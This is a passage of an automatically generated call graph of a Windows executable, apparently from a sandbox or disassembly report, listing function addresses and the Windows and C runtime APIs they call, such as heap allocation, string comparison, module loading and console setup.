calls 38759->38760 38761 7ff7f7e9a0d8 38760->38761 38761->38723 38762->38714 38763->38712 38764->38717 38765->38737 38766->38739 38767->38734 38768->38509 38770->38507 38772->38529 38773->38523 38775 7ff7f7ea1c37 38774->38775 38776 7ff7f7ea1c3b 38774->38776 38775->38315 38776->38775 38777 7ff7f7ea1c5d 38776->38777 38785 7ff7f7ea2d6c 12 API calls 2 library calls 38777->38785 38780 7ff7f7ea1964 38779->38780 38781 7ff7f7ea194c 38779->38781 38782 7ff7f7ea1988 38780->38782 38786 7ff7f7e9c9d0 10 API calls 38780->38786 38781->38780 38783 7ff7f7ea1958 FindCloseChangeNotification 38781->38783 38782->38315 38783->38780 38785->38775 38786->38782 38787->38329 38789 7ff7f7eca924 38790 7ff7f7eca949 sprintf 38789->38790 38791 7ff7f7eca97f CompareStringA 38790->38791 38792 7ff7f7ee9c74 38793 7ff7f7ee9c7c 38792->38793 38794 7ff7f7ee9cbb 38793->38794 38795 7ff7f7ee9cac 38793->38795 38796 7ff7f7ee9cc5 38794->38796 38814 7ff7f7eece08 32 API calls 2 library calls 38794->38814 38813 7ff7f7ee4f3c 15 API calls memcpy_s 38795->38813 38801 7ff7f7ee4b8c 38796->38801 38800 7ff7f7ee9cb1 memcpy_s 38802 7ff7f7ee4ba1 38801->38802 38803 7ff7f7ee4bab 38801->38803 38815 7ff7f7ee4ab4 38802->38815 38804 7ff7f7ee4bb0 38803->38804 38805 7ff7f7ee4bb7 __vcrt_getptd_noexit 38803->38805 38822 7ff7f7ee4a74 38804->38822 38808 7ff7f7ee4bf6 38805->38808 38810 7ff7f7ee4be0 RtlReAllocateHeap 38805->38810 38812 7ff7f7ee36c0 new 2 API calls 38805->38812 38828 7ff7f7ee4f3c 15 API calls memcpy_s 38808->38828 38809 7ff7f7ee4ba9 38809->38800 38810->38805 38810->38809 38812->38805 38813->38800 38814->38796 38816 7ff7f7ee4aff 38815->38816 38820 7ff7f7ee4ac3 __vcrt_getptd_noexit 38815->38820 38829 7ff7f7ee4f3c 15 API calls memcpy_s 38816->38829 38818 7ff7f7ee4ae6 RtlAllocateHeap 38819 7ff7f7ee4afd 38818->38819 38818->38820 38819->38809 38820->38816 38820->38818 38821 7ff7f7ee36c0 new 2 API calls 38820->38821 38821->38820 38823 7ff7f7ee4aa9 __vcrt_freefls 38822->38823 38824 7ff7f7ee4a79 RtlRestoreThreadPreferredUILanguages 38822->38824 38823->38809 38824->38823 38825 7ff7f7ee4a94 38824->38825 38830 7ff7f7ee4f3c 15 API calls memcpy_s 38825->38830 38827 7ff7f7ee4a99 GetLastError 38827->38823 38828->38809 38829->38819 38830->38827 38831 7ff7f7e87a5b 38832 7ff7f7e87a60 38831->38832 38833 7ff7f7e99be0 14 API calls 38832->38833 38834 7ff7f7e87af7 38832->38834 38833->38834 38835 7ff7f7e87bda 38834->38835 38864 7ff7f7ea1e1c GetFileTime 38834->38864 38836 7ff7f7e8b540 147 API calls 38835->38836 38838 7ff7f7e87bf8 38836->38838 38841 7ff7f7e87c3e 38838->38841 38865 7ff7f7ed9b98 216 API calls 3 library calls 38838->38865 38840 7ff7f7e8b540 147 API calls 38842 7ff7f7e87c9c 38840->38842 38841->38840 38863 7ff7f7e87f89 38842->38863 38866 7ff7f7ea6378 38842->38866 38844 7ff7f7e87cd7 38845 7ff7f7ea6378 4 API calls 38844->38845 38846 7ff7f7e87cf3 38845->38846 38847 7ff7f7e87d59 38846->38847 38848 7ff7f7e87d38 38846->38848 38860 7ff7f7e87de1 38846->38860 38851 7ff7f7eda444 new 4 API calls 38847->38851 38870 7ff7f7eda444 38848->38870 38856 7ff7f7e87d42 std::bad_alloc::bad_alloc 38851->38856 38852 7ff7f7e87e4e 38883 7ff7f7e81204 48 API calls 38852->38883 38854 7ff7f7e87eb3 38857 7ff7f7e87edb 38854->38857 38884 7ff7f7eb9680 38854->38884 38856->38860 38876 7ff7f7edba34 RtlPcToFileHeader RaiseException 38856->38876 38890 7ff7f7ea6424 8 API calls _handle_error 38857->38890 38860->38852 38877 7ff7f7eb98dc 38860->38877 38861 7ff7f7e87f56 38862 7ff7f7e8b540 147 API calls 38861->38862 38862->38863 38864->38835 38865->38841 38867 7ff7f7ea6396 38866->38867 38869 7ff7f7ea63a0 38866->38869 38868 7ff7f7eda444 new 4 API calls 38867->38868 38868->38869 38869->38844 38871 7ff7f7eda44f 38870->38871 38872 7ff7f7eda47a 38871->38872 38873 7ff7f7ee36c0 new 2 API calls 38871->38873 38891 7ff7f7edb314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38871->38891 38892 7ff7f7edb2f4 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38871->38892 38872->38856 38873->38871 38876->38860 38878 7ff7f7eb9926 38877->38878 38879 7ff7f7eb993c 38877->38879 38880 7ff7f7e990b8 75 API calls 38878->38880 38881 7ff7f7e990b8 75 API calls 38879->38881 38882 7ff7f7eb9934 38880->38882 38881->38882 38882->38852 38883->38854 38889 7ff7f7eb96a4 38884->38889 38885 7ff7f7eb97d7 38886 7ff7f7ea2574 126 API calls 38886->38889 38888 7ff7f7ed9b98 216 API calls 38888->38889 38889->38885 38889->38886 38889->38888 38893 7ff7f7ea6498 72 API calls new 38889->38893 38890->38861 38893->38889 38894 7ff7f7ee2450 38901 7ff7f7ee3734 38894->38901 38896 7ff7f7ee2455 38897 7ff7f7ee6998 fflush LeaveCriticalSection 38896->38897 38898 7ff7f7ee2460 38897->38898 38899 7ff7f7ee246c 38898->38899 38900 7ff7f7ee2488 11 API calls 38898->38900 38900->38899 38906 7ff7f7ee5630 GetLastError 38901->38906 38903 7ff7f7ee373f 38926 7ff7f7ee4a1c 35 API calls abort 38903->38926 38907 7ff7f7ee564d 38906->38907 38908 7ff7f7ee5652 38906->38908 38927 7ff7f7ee6cf4 6 API calls __vcrt_uninitialize_ptd 38907->38927 38912 7ff7f7ee569b 38908->38912 38928 7ff7f7ee4b14 15 API calls 3 library calls 38908->38928 38911 7ff7f7ee5669 38913 7ff7f7ee5671 38911->38913 38929 7ff7f7ee6d4c 6 API calls __vcrt_uninitialize_ptd 38911->38929 38914 7ff7f7ee56b6 SetLastError 38912->38914 38915 7ff7f7ee56a0 SetLastError 38912->38915 38918 7ff7f7ee4a74 __vcrt_freefls 15 API calls 38913->38918 38931 7ff7f7ee4a1c 35 API calls abort 38914->38931 38915->38903 38921 7ff7f7ee5678 38918->38921 38919 7ff7f7ee5688 38919->38913 38922 7ff7f7ee568f 38919->38922 38921->38914 38930 7ff7f7ee53e0 15 API calls memcpy_s 38922->38930 38924 7ff7f7ee5694 38925 7ff7f7ee4a74 __vcrt_freefls 15 API calls 38924->38925 38925->38912 38927->38908 38928->38911 38929->38919 38930->38924 38932 7ff7f7ecbb70 38935 7ff7f7ecbb80 38932->38935 38944 7ff7f7ecbae8 38935->38944 38937 7ff7f7ecbb79 38938 7ff7f7ecbb97 38938->38937 38949 7ff7f7e91690 38938->38949 38940 7ff7f7ecbbd5 LeaveCriticalSection 38942 7ff7f7ecbae8 67 API calls 38940->38942 38941 7ff7f7ecbbc8 SetEvent 38941->38940 38942->38938 38953 7ff7f7ecb974 WaitForSingleObject 38944->38953 38947 7ff7f7ecbb16 EnterCriticalSection LeaveCriticalSection 38948 7ff7f7ecbb12 38947->38948 38948->38938 38950 7ff7f7e916c2 EnterCriticalSection 38949->38950 38951 7ff7f7e916a4 38949->38951 38950->38940 38950->38941 38951->38950 38961 7ff7f7e91180 38951->38961 38954 7ff7f7ecb986 GetLastError 38953->38954 38955 7ff7f7ecb9b7 38953->38955 38959 7ff7f7e9ca6c 48 API calls 3 library calls 38954->38959 38955->38947 38955->38948 38957 7ff7f7ecb9a6 38960 7ff7f7e9ca40 61 API calls _CxxThrowException 38957->38960 38959->38957 38960->38955 38962 7ff7f7e911ab 38961->38962 38970 7ff7f7e911b0 38961->38970 38971 7ff7f7e917c8 216 API calls 2 library calls 38962->38971 38964 7ff7f7e9166a 38964->38951 38965 7ff7f7eb6d38 216 API calls 38965->38970 38966 7ff7f7eb6fe8 216 API calls 38966->38970 38967 7ff7f7e91080 48 API calls 38967->38970 38968 7ff7f7eb6e90 216 API calls 38968->38970 38970->38964 38970->38965 38970->38966 38970->38967 38970->38968 38972 7ff7f7e917c8 216 API calls 2 library calls 38970->38972 38971->38970 38972->38970 38973 7ff7f7edb0fc 38992 7ff7f7edaa8c 38973->38992 38976 7ff7f7edb123 __scrt_acquire_startup_lock 38978 7ff7f7edb148 38976->38978 39048 7ff7f7edb52c 7 API calls memcpy_s 38976->39048 38982 7ff7f7edb169 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 38978->38982 39000 7ff7f7ee472c 38978->39000 38981 7ff7f7edb16d 38982->38981 38983 7ff7f7edb1f7 38982->38983 39049 7ff7f7ee2574 35 API calls IsInExceptionSpec 38982->39049 39004 7ff7f7ee3fc4 38983->39004 38990 7ff7f7edb220 39050 7ff7f7edac64 8 API calls 2 library calls 38990->39050 38993 7ff7f7edaaae __isa_available_init 38992->38993 39051 7ff7f7ede2f8 38993->39051 38996 7ff7f7edaab7 38996->38976 39047 7ff7f7edb52c 7 API calls memcpy_s 38996->39047 39002 7ff7f7ee4744 39000->39002 39001 7ff7f7ee4766 39001->38982 39002->39001 39100 7ff7f7edb010 39002->39100 39005 7ff7f7ee3fd4 39004->39005 39006 7ff7f7edb20c 39004->39006 39185 7ff7f7ee3c84 39005->39185 39008 7ff7f7eb7e20 39006->39008 39217 7ff7f7ecb470 GetModuleHandleW 39008->39217 39014 7ff7f7eb7e58 SetErrorMode GetModuleHandleW 39015 7ff7f7ec48cc 21 API calls 39014->39015 39016 7ff7f7eb7e7d 39015->39016 39017 7ff7f7ec3e48 137 API calls 39016->39017 39018 7ff7f7eb7e90 39017->39018 39019 7ff7f7e93d3c 126 API calls 39018->39019 39020 7ff7f7eb7e9c 39019->39020 39021 7ff7f7eda444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39020->39021 39022 7ff7f7eb7ead 39021->39022 39023 7ff7f7eb7ebf 39022->39023 39024 7ff7f7e93f18 70 API calls 39022->39024 39025 7ff7f7e94d1c 157 API calls 39023->39025 39024->39023 39026 7ff7f7eb7ed6 39025->39026 39027 7ff7f7eb7eef 39026->39027 39029 7ff7f7e96ad0 154 API calls 39026->39029 39028 7ff7f7e94d1c 157 API calls 39027->39028 39030 7ff7f7eb7eff 39028->39030 39031 7ff7f7eb7ee7 39029->39031 39032 7ff7f7eb7f0d 39030->39032 39035 7ff7f7eb7f14 39030->39035 39033 7ff7f7e94e48 160 API calls 39031->39033 39034 7ff7f7ecb650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 39032->39034 39033->39027 39034->39035 39036 7ff7f7e94888 58 API calls 39035->39036 39037 7ff7f7eb7f57 39036->39037 39038 7ff7f7e94fd0 268 API calls 39037->39038 39039 7ff7f7eb7f5f 39038->39039 39040 7ff7f7eb7f9e 39039->39040 39041 7ff7f7eb7f8c 39039->39041 39045 7ff7f7edb684 GetModuleHandleW 39040->39045 39042 7ff7f7ecb650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 39041->39042 39043 7ff7f7eb7f93 39042->39043 39043->39040 39044 7ff7f7ecb57c 14 API calls 39043->39044 39044->39040 39046 7ff7f7edb698 39045->39046 39046->38990 39047->38976 39048->38978 39049->38983 39050->38981 39052 7ff7f7ede301 __vcrt_initialize_pure_virtual_call_handler __vcrt_initialize_winapi_thunks 39051->39052 39064 7ff7f7edeb08 39052->39064 39055 7ff7f7edaab3 39055->38996 39059 7ff7f7ee45e4 39055->39059 39057 7ff7f7ede318 39057->39055 39071 7ff7f7edeb50 DeleteCriticalSection 39057->39071 39061 7ff7f7ee9d4c 39059->39061 39060 7ff7f7edaac0 39060->38996 39063 7ff7f7ede32c 8 API calls 3 library calls 39060->39063 39061->39060 39088 7ff7f7ee66c0 39061->39088 39063->38996 39065 7ff7f7edeb10 39064->39065 39067 7ff7f7edeb41 39065->39067 39069 7ff7f7ede30b 39065->39069 39072 7ff7f7ede678 39065->39072 39077 7ff7f7edeb50 DeleteCriticalSection 39067->39077 39069->39055 39070 7ff7f7ede8a4 8 API calls 3 library calls 39069->39070 39070->39057 39071->39055 39078 7ff7f7ede34c 39072->39078 39075 7ff7f7ede6cf InitializeCriticalSectionAndSpinCount 39076 7ff7f7ede6bb 39075->39076 39076->39065 39077->39069 39079 7ff7f7ede3ad 39078->39079 39080 7ff7f7ede3b2 39078->39080 39079->39080 39081 7ff7f7ede3e5 LoadLibraryExW 39079->39081 39084 7ff7f7ede47a 39079->39084 39087 7ff7f7ede458 FreeLibrary 39079->39087 39080->39075 39080->39076 39081->39079 39083 7ff7f7ede40b GetLastError 39081->39083 39082 7ff7f7ede489 GetProcAddress 39082->39080 39085 7ff7f7ede4a1 39082->39085 39083->39079 39086 7ff7f7ede416 LoadLibraryExW 39083->39086 39084->39080 39084->39082 39085->39080 39086->39079 39087->39079 39099 7ff7f7ee6938 EnterCriticalSection 39088->39099 39090 7ff7f7ee66d0 39091 7ff7f7ee8050 32 API calls 39090->39091 39092 7ff7f7ee66d9 39091->39092 39093 7ff7f7ee66e7 39092->39093 39095 7ff7f7ee64d0 34 API calls 39092->39095 39094 7ff7f7ee6998 fflush LeaveCriticalSection 39093->39094 39096 7ff7f7ee66f3 39094->39096 39097 7ff7f7ee66e2 39095->39097 39096->39061 39098 7ff7f7ee65bc GetStdHandle GetFileType 39097->39098 39098->39093 39101 7ff7f7edb020 pre_c_initialization 39100->39101 39121 7ff7f7ee2b00 39101->39121 39103 7ff7f7edb02c pre_c_initialization 39127 7ff7f7edaad8 39103->39127 39105 7ff7f7edb045 39106 7ff7f7edb0b5 39105->39106 39107 7ff7f7edb049 _RTC_Initialize 39105->39107 39164 7ff7f7edb52c 7 API calls memcpy_s 39106->39164 39132 7ff7f7edace0 39107->39132 39109 7ff7f7edb0bf 39165 7ff7f7edb52c 7 API calls memcpy_s 39109->39165 39112 7ff7f7edb05a pre_c_initialization 39135 7ff7f7ee3b0c 39112->39135 39113 7ff7f7edb0ca __scrt_initialize_default_local_stdio_options 39113->39002 39116 7ff7f7edb06a 39163 7ff7f7edb7dc RtlInitializeSListHead 39116->39163 39118 7ff7f7edb06f __CxxCallCatchBlock pre_c_initialization 39119 7ff7f7ee4818 pre_c_initialization 35 API calls 39118->39119 39120 7ff7f7edb09a pre_c_initialization 39119->39120 39120->39002 39122 7ff7f7ee2b11 39121->39122 39123 7ff7f7ee2b19 39122->39123 39166 7ff7f7ee4f3c 15 API calls memcpy_s 39122->39166 39123->39103 39125 7ff7f7ee2b28 39167 7ff7f7ee4e1c 31 API calls _invalid_parameter_noinfo 39125->39167 39128 7ff7f7edab96 39127->39128 39131 7ff7f7edaaf0 __scrt_initialize_onexit_tables 39127->39131 39168 7ff7f7edb52c 7 API calls memcpy_s 39128->39168 39130 7ff7f7edaba0 39131->39105 39169 7ff7f7edac90 39132->39169 39134 7ff7f7edace9 39134->39112 39136 7ff7f7ee3b40 39135->39136 39137 7ff7f7ee3b2a 39135->39137 39176 7ff7f7ee9370 39136->39176 39174 7ff7f7ee4f3c 15 API calls memcpy_s 39137->39174 39141 7ff7f7ee3b2f 39175 7ff7f7ee4e1c 31 API calls _invalid_parameter_noinfo 39141->39175 39143 7ff7f7ee3b72 39180 7ff7f7ee38ec 35 API calls pre_c_initialization 39143->39180 39144 7ff7f7edb066 39144->39109 39144->39116 39146 7ff7f7ee3b9c 39181 7ff7f7ee3aa8 15 API calls 2 library calls 39146->39181 39148 7ff7f7ee3bb2 39149 7ff7f7ee3bcb 39148->39149 39150 7ff7f7ee3bba 39148->39150 39183 7ff7f7ee38ec 35 API calls pre_c_initialization 39149->39183 39182 7ff7f7ee4f3c 15 API calls memcpy_s 39150->39182 39153 7ff7f7ee4a74 __vcrt_freefls 15 API calls 39153->39144 39154 7ff7f7ee3be7 39155 7ff7f7ee3c30 39154->39155 39156 7ff7f7ee3c17 39154->39156 39160 7ff7f7ee3bbf 39154->39160 39159 7ff7f7ee4a74 __vcrt_freefls 15 API calls 39155->39159 39157 7ff7f7ee4a74 __vcrt_freefls 15 API calls 39156->39157 39158 7ff7f7ee3c20 39157->39158 39161 7ff7f7ee4a74 __vcrt_freefls 15 API calls 39158->39161 39159->39160 39160->39153 39162 7ff7f7ee3c2c 39161->39162 39162->39144 39164->39109 39165->39113 39166->39125 39167->39123 39168->39130 39170 7ff7f7edacbf 39169->39170 39172 7ff7f7edacb5 _onexit 39169->39172 39173 7ff7f7ee4434 34 API calls _onexit 39170->39173 39172->39134 39173->39172 39174->39141 39175->39144 39177 7ff7f7ee937d 39176->39177 39179 7ff7f7ee3b45 GetModuleFileNameA 39176->39179 39184 7ff7f7ee91b0 48 API calls 6 library calls 39177->39184 39179->39143 39180->39146 39181->39148 39182->39160 39183->39154 39184->39179 39186 7ff7f7ee3ca1 39185->39186 39187 7ff7f7ee3c98 39185->39187 39186->39006 39187->39186 39191 7ff7f7ee3ccc 39187->39191 39192 7ff7f7ee3ce5 39191->39192 39201 7ff7f7ee3caa 39191->39201 39193 7ff7f7ee9370 pre_c_initialization 48 API calls 39192->39193 39194 7ff7f7ee3cea 39193->39194 39204 7ff7f7ee978c GetEnvironmentStringsW 39194->39204 39197 7ff7f7ee3cf7 39199 7ff7f7ee4a74 __vcrt_freefls 15 API calls 39197->39199 39199->39201 39200 7ff7f7ee3d04 39202 7ff7f7ee4a74 __vcrt_freefls 15 API calls 39200->39202 39201->39186 39203 7ff7f7ee3e78 17 API calls 2 library calls 39201->39203 39202->39197 39203->39186 39205 7ff7f7ee985e 39204->39205 39206 7ff7f7ee97ba WideCharToMultiByte 39204->39206 39209 7ff7f7ee3cef 39205->39209 39210 7ff7f7ee9868 FreeEnvironmentStringsW 39205->39210 39206->39205 39208 7ff7f7ee9814 39206->39208 39211 7ff7f7ee4ab4 setbuf 16 API calls 39208->39211 39209->39197 39216 7ff7f7ee3d38 31 API calls 4 library calls 39209->39216 39210->39209 39212 7ff7f7ee981c 39211->39212 39213 7ff7f7ee984b 39212->39213 39214 7ff7f7ee9824 WideCharToMultiByte 39212->39214 39215 7ff7f7ee4a74 __vcrt_freefls 15 API calls 39213->39215 39214->39213 39215->39205 39216->39200 39218 7ff7f7ecb496 GetProcAddress 39217->39218 39219 7ff7f7eb7e45 39217->39219 39220 7ff7f7ecb4cb GetProcAddress 39218->39220 39221 7ff7f7ecb4ae 39218->39221 39222 7ff7f7e97a68 39219->39222 39220->39219 39221->39220 39223 7ff7f7e97a76 39222->39223 39243 7ff7f7ee2ae4 39223->39243 39225 7ff7f7e97a80 39226 7ff7f7ee2ae4 setbuf 60 API calls 39225->39226 39227 7ff7f7e97a94 39226->39227 39252 7ff7f7e97b44 GetStdHandle GetFileType 39227->39252 39230 7ff7f7e97b44 3 API calls 39231 7ff7f7e97aae 39230->39231 39232 7ff7f7e97b44 3 API calls 39231->39232 39234 7ff7f7e97abe 39232->39234 39233 7ff7f7e97b12 39242 7ff7f7e9cd78 SetConsoleCtrlHandler 39233->39242 39236 7ff7f7e97aeb 39234->39236 39255 7ff7f7ee2abc 31 API calls 2 library calls 39234->39255 39236->39233 39257 7ff7f7ee2abc 31 API calls 2 library calls 39236->39257 39237 7ff7f7e97adf 39256 7ff7f7ee2b40 33 API calls 3 library calls 39237->39256 39240 7ff7f7e97b06 39258 7ff7f7ee2b40 33 API calls 3 library calls 39240->39258 39244 7ff7f7ee2ae9 39243->39244 39245 7ff7f7ee7ee8 39244->39245 39247 7ff7f7ee7f23 39244->39247 39259 7ff7f7ee4f3c 15 API calls memcpy_s 39245->39259 39261 7ff7f7ee7d98 60 API calls 2 library calls 39247->39261 39248 7ff7f7ee7eed 39260 7ff7f7ee4e1c 31 API calls _invalid_parameter_noinfo 39248->39260 39251 7ff7f7ee7ef8 39251->39225 39253 7ff7f7e97b61 GetConsoleMode 39252->39253 39254 7ff7f7e97a9e 39252->39254 39253->39254 39254->39230 39255->39237 39256->39236 39257->39240 39258->39233 39259->39248 39260->39251 39261->39251 39262 7ff7f7ee231c 39263 7ff7f7ee2342 GetModuleHandleW 39262->39263 39264 7ff7f7ee238c 39262->39264 39263->39264 39270 7ff7f7ee234f 39263->39270 39275 7ff7f7ee6938 EnterCriticalSection 39264->39275 39266 7ff7f7ee6998 fflush LeaveCriticalSection 39268 7ff7f7ee2460 39266->39268 39267 7ff7f7ee2396 39271 7ff7f7ee2410 39267->39271 39273 7ff7f7ee43b8 16 API calls 39267->39273 39269 7ff7f7ee246c 39268->39269 39272 7ff7f7ee2488 11 API calls 39268->39272 39270->39264 39276 7ff7f7ee24d4 GetModuleHandleExW 39270->39276 39271->39266 39272->39269 39273->39271 39277 7ff7f7ee2525 39276->39277 39278 7ff7f7ee24fe GetProcAddress 39276->39278 39280 7ff7f7ee2535 39277->39280 39281 7ff7f7ee252f FreeLibrary 39277->39281 39278->39277 39279 7ff7f7ee2518 39278->39279 39279->39277 39280->39264 39281->39280 39282 7ff7f7e81884 39414 7ff7f7eb34e4 39282->39414 39285 7ff7f7eb34e4 CompareStringW 39287 7ff7f7e818a6 39285->39287 39286 7ff7f7e81926 39288 7ff7f7e8195b 39286->39288 39478 7ff7f7eb3f98 63 API calls 2 library calls 39286->39478 39290 7ff7f7eb34e4 CompareStringW 39287->39290 39295 7ff7f7e818b9 39287->39295 39296 7ff7f7e81970 39288->39296 39479 7ff7f7ea2ed8 100 API calls 3 library calls 39288->39479 39290->39295 39293 7ff7f7e81915 39477 7ff7f7e9ca40 61 API calls _CxxThrowException 39293->39477 39295->39286 39476 7ff7f7e81168 8 API calls 2 library calls 39295->39476 39297 7ff7f7e819b8 39296->39297 39480 7ff7f7ec49f4 48 API calls 39296->39480 39418 7ff7f7e85450 39297->39418 39299 7ff7f7e819b0 39481 7ff7f7e98444 54 API calls fflush 39299->39481 39305 7ff7f7e872c4 76 API calls 39312 7ff7f7e81a12 39305->39312 39306 7ff7f7e81ae6 39452 7ff7f7e87514 39306->39452 39307 7ff7f7e81b04 39456 7ff7f7e96c94 39307->39456 39310 7ff7f7e81af2 39311 7ff7f7e87514 72 API calls 39310->39311 39313 7ff7f7e81aff 39311->39313 39312->39306 39312->39307 39314 7ff7f7eda610 _handle_error 8 API calls 39313->39314 39315 7ff7f7e82f97 39314->39315 39316 7ff7f7e81b13 39472 7ff7f7e87148 39316->39472 39318 7ff7f7e81c71 39319 7ff7f7e81ca7 39318->39319 39320 7ff7f7e863e8 8 API calls 39318->39320 39321 7ff7f7e81cd5 39319->39321 39322 7ff7f7e81ce4 39319->39322 39323 7ff7f7e81c91 39320->39323 39326 7ff7f7eda444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39321->39326 39324 7ff7f7eda444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39322->39324 39325 7ff7f7e849b8 99 API calls 39323->39325 39330 7ff7f7e81cee 39324->39330 39327 7ff7f7e81c9d 39325->39327 39326->39330 39328 7ff7f7e863e8 8 API calls 39327->39328 39328->39319 39329 7ff7f7e81d50 39332 7ff7f7eda444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39329->39332 39330->39329 39331 7ff7f7ecde30 72 API calls 39330->39331 39331->39329 39333 7ff7f7e81d62 39332->39333 39334 7ff7f7ecdbd0 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39333->39334 39335 7ff7f7e81d7b 39333->39335 39334->39335 39336 7ff7f7ed2bcc 66 API calls 39335->39336 39337 7ff7f7e81dba 39336->39337 39410 7ff7f7eaae10 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39337->39410 39338 7ff7f7e81e1c 39340 7ff7f7e810c0 8 API calls 39338->39340 39342 7ff7f7e81e5d 39338->39342 39339 7ff7f7e81dde std::bad_alloc::bad_alloc 39339->39338 39341 7ff7f7edba34 _CxxThrowException RtlPcToFileHeader RaiseException 39339->39341 39340->39342 39341->39338 39343 7ff7f7e8a410 159 API calls 39342->39343 39407 7ff7f7e81ef4 39342->39407 39343->39407 39344 7ff7f7e82d0c 39346 7ff7f7ecde30 72 API calls 39344->39346 39352 7ff7f7e82d21 39344->39352 39345 7ff7f7e82ccc 39345->39344 39409 7ff7f7ea8c80 72 API calls 39345->39409 39346->39352 39347 7ff7f7e82d86 39353 7ff7f7ec49f4 48 API calls 39347->39353 39388 7ff7f7e82dd0 39347->39388 39348 7ff7f7ec49f4 48 API calls 39406 7ff7f7e82005 39348->39406 39349 7ff7f7ea6688 48 API calls 39349->39407 39350 7ff7f7e85e70 169 API calls 39350->39406 39351 7ff7f7e880e4 192 API calls 39351->39388 39352->39347 39356 7ff7f7ec49f4 48 API calls 39352->39356 39355 7ff7f7e82d9e 39353->39355 39354 7ff7f7e8a504 208 API calls 39354->39388 39359 7ff7f7e98444 54 API calls 39355->39359 39361 7ff7f7e82d6c 39356->39361 39357 7ff7f7e85928 237 API calls 39357->39406 39358 7ff7f7e8e6c8 157 API calls 39358->39407 39362 7ff7f7e82da6 39359->39362 39360 7ff7f7ea7c7c 127 API calls 39360->39388 39363 7ff7f7ec49f4 48 API calls 39361->39363 39371 7ff7f7ea1c24 12 API calls 39362->39371 39367 7ff7f7e82d79 39363->39367 39364 7ff7f7e9e21c 63 API calls 39364->39406 39365 7ff7f7e81168 8 API calls 39365->39388 39366 7ff7f7e8b540 147 API calls 39366->39407 39369 7ff7f7e98444 54 API calls 39367->39369 39368 7ff7f7e8a410 159 API calls 39368->39407 39369->39347 39370 7ff7f7ea65b4 48 API calls 39370->39407 39371->39388 39372 7ff7f7e8a4d0 12 API calls 39372->39407 39373 7ff7f7ea4554 16 API calls 39373->39407 39374 7ff7f7ea1998 138 API calls 39374->39407 39375 7ff7f7ecae50 71 API calls 39378 7ff7f7e82e39 39375->39378 39376 7ff7f7e833b4 64 API calls 39376->39388 39377 7ff7f7e85db4 46 API calls 39377->39407 39378->39375 39379 7ff7f7e9ca40 61 API calls 39378->39379 39378->39388 39379->39388 39380 7ff7f7e86188 231 API calls 39380->39388 39381 7ff7f7ea1e80 15 API calls 39381->39407 39382 7ff7f7ea1930 11 API calls 39382->39407 39383 7ff7f7e83f74 138 API calls 39383->39388 39384 7ff7f7e8b540 147 API calls 39384->39406 39385 7ff7f7ea7c7c 127 API calls 39385->39407 39386 7ff7f7ec49f4 48 API calls 39386->39388 39387 7ff7f7ebba9c 195 API calls 39387->39388 39388->39351 39388->39354 39388->39360 39388->39365 39388->39376 39388->39378 39388->39380 39388->39383 39388->39386 39388->39387 39390 7ff7f7e98444 54 API calls 39388->39390 39389 7ff7f7e85004 49 API calls 39389->39407 39390->39388 39391 7ff7f7e8571c 12 API calls 39391->39407 39392 7ff7f7ea18ac 15 API calls 39392->39407 39393 7ff7f7e81168 8 API calls 39393->39407 39394 7ff7f7ecd48c 58 API calls 39394->39407 39395 7ff7f7e85e70 169 API calls 39395->39407 39396 7ff7f7e99be0 14 API calls 39396->39407 39397 7ff7f7ecc0a8 10 API calls 39397->39407 39398 7ff7f7ea6378 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39398->39407 39399 7ff7f7eb97f0 GetStdHandle ReadFile GetLastError GetLastError GetFileType 39399->39407 39400 7ff7f7e9cbd0 75 API calls 39400->39407 39401 7ff7f7ea5c0c 237 API calls 39401->39407 39402 7ff7f7ea5d40 237 API calls 39402->39407 39403 7ff7f7ecb6d0 73 API calls 39403->39406 39404 7ff7f7e86114 216 API calls 39404->39407 39405 7ff7f7ea5708 237 API calls 39405->39407 39406->39348 39406->39350 39406->39357 39406->39364 39406->39384 39406->39403 39406->39407 39408 7ff7f7e98444 54 API calls 39406->39408 39407->39345 39407->39349 39407->39358 39407->39366 39407->39368 39407->39370 39407->39372 39407->39373 39407->39374 39407->39377 39407->39381 39407->39382 39407->39385 39407->39389 39407->39391 39407->39392 39407->39393 39407->39394 39407->39395 39407->39396 39407->39397 39407->39398 39407->39399 39407->39400 39407->39401 39407->39402 39407->39404 39407->39405 39407->39406 39411 7ff7f7eaa250 237 API calls 39407->39411 39412 7ff7f7e90d60 237 API calls 39407->39412 39413 7ff7f7eaaae0 237 API calls 39407->39413 39408->39406 39409->39344 39410->39339 39411->39407 39412->39406 39413->39406 39415 7ff7f7eb34f6 39414->39415 39416 7ff7f7e81893 39415->39416 39482 7ff7f7ecdac0 CompareStringW 39415->39482 39416->39285 39416->39295 39420 7ff7f7e8546f setbuf 39418->39420 39419 7ff7f7e8554a memcpy_s 39423 7ff7f7ecc0a8 10 API calls 39419->39423 39420->39419 39429 7ff7f7e85588 memcpy_s 39420->39429 39422 7ff7f7e85583 39512 7ff7f7e86eb8 39422->39512 39424 7ff7f7e85576 39423->39424 39427 7ff7f7e8681c 54 API calls 39424->39427 39427->39422 39428 7ff7f7e856e9 39519 7ff7f7ec6f68 39428->39519 39429->39422 39483 7ff7f7e83210 39429->39483 39489 7ff7f7e97088 39429->39489 39493 7ff7f7e8681c 39429->39493 39504 7ff7f7ec7a24 39429->39504 39523 7ff7f7e8571c 39429->39523 39531 7ff7f7e94380 14 API calls 39429->39531 39431 7ff7f7e856f6 39432 7ff7f7eda610 _handle_error 8 API calls 39431->39432 39433 7ff7f7e819df 39432->39433 39438 7ff7f7e872c4 39433->39438 39439 7ff7f7e872eb 39438->39439 39641 7ff7f7e988dc 39439->39641 39441 7ff7f7e87302 39645 7ff7f7eb915c 39441->39645 39443 7ff7f7e8730f 39657 7ff7f7eb7044 39443->39657 39446 7ff7f7eda444 new 4 API calls 39447 7ff7f7e873e3 39446->39447 39448 